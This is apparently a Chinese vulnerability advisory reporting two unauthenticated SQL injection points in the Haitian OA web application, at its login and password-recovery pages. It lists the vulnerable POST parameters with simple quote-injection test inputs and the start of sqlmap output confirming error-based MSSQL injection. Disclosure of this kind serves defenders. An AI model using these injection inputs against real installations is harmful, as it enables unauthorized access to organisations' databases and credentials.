海天OA /loginverify.asp ...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 0x01 漏洞简介 提交时间:2014-05-25 公开时间:2014-08-21 漏洞类型:SQL注射漏洞 北京联杰海天科技有限公司是一家专业从事应用软件开发、集成服务的高科技企业,面向各类企事业单位开发、销售基于Internet/Intranet技术的系列软件产品,致力于政府机构及企业信息化和办公自动化建设。 目前,联杰公司凭借Microsoft系统平台上的开发经验,已经成功推出了基于Internet/Intranet平台的企业级网络应用系统。主打软件“海天OA” 就是其中之一。她率先融入管理概念,采用B/S架构,友好的界面,严谨的结构,简单的操作方式,不仅是您员工办公的好助手,更是协助您管理好公司必不可少的左右手。 官方主页:www.haitiansoft.com ![](https://images.seebug.org/contribute/a1783b6c-523c-4c78-ae97-48bb653604c0) 海天OA /loginverify.asp /LosePassAction.asp 两处存在post类型的sql注漏洞(无需登录) ### 0x02 漏洞利用 第一处SQL注入 登陆处存在SQL注入 http://**.**.**.**/loginverify.asp POST:Digest=&urlFrom=&username=123'&password=123 ![](https://images.seebug.org/contribute/f414ff6d-1c5a-45a8-b360-6f0991f9ab76) 第二处SQL注入 在忘记密码,密码找回处 链接:http://**.**.**.**/LosePassAction.asp PSOT:username=123%27&Remark=123%27 ![](https://images.seebug.org/contribute/e560013a-b8d0-4c81-a4f6-b16d2ea1ba4c) sqlmap: ``` --- Place: POST Parameter: username Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息